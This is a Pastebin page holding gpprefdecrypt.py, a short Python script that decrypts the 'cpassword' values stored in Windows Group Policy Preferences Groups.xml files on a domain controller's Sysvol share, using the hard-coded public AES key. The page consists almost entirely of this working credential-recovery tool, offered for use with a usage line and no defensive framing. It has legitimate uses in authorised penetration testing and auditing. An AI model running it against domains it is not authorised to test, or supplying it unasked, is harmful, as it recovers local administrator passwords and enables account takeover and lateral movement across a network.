daily pastebin goal
75%
SHARE
TWEET

gpprefdecrypt.py

leonteale Dec 20th, 2012 2,495 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #
  3. # Gpprefdecrypt - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
  4. #
  5. # This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share.
  6. #
  7.  
  8. import sys
  9. from Crypto.Cipher import AES
  10. from base64 import b64decode
  11.  
  12. if(len(sys.argv) != 2):
  13.   print "Usage: gpprefdecrypt.py <cpassword>"
  14.   sys.exit(0)
  15.  
  16. # Init the key
  17. # From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
  18. key = """
  19. 4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
  20. f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
  21. """.replace(" ","").replace("\n","").decode('hex')
  22.  
  23. # Add padding to the base64 string and decode it
  24. cpassword = sys.argv[1]
  25. cpassword += "=" * ((4 - len(sys.argv[1]) % 4) % 4)
  26. password = b64decode(cpassword)
  27.  
  28. # Decrypt the password
  29. o = AES.new(key, AES.MODE_CBC).decrypt(password)
  30.  
  31. # Print it
  32. print o[:-ord(o[-1])].decode('utf16')
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top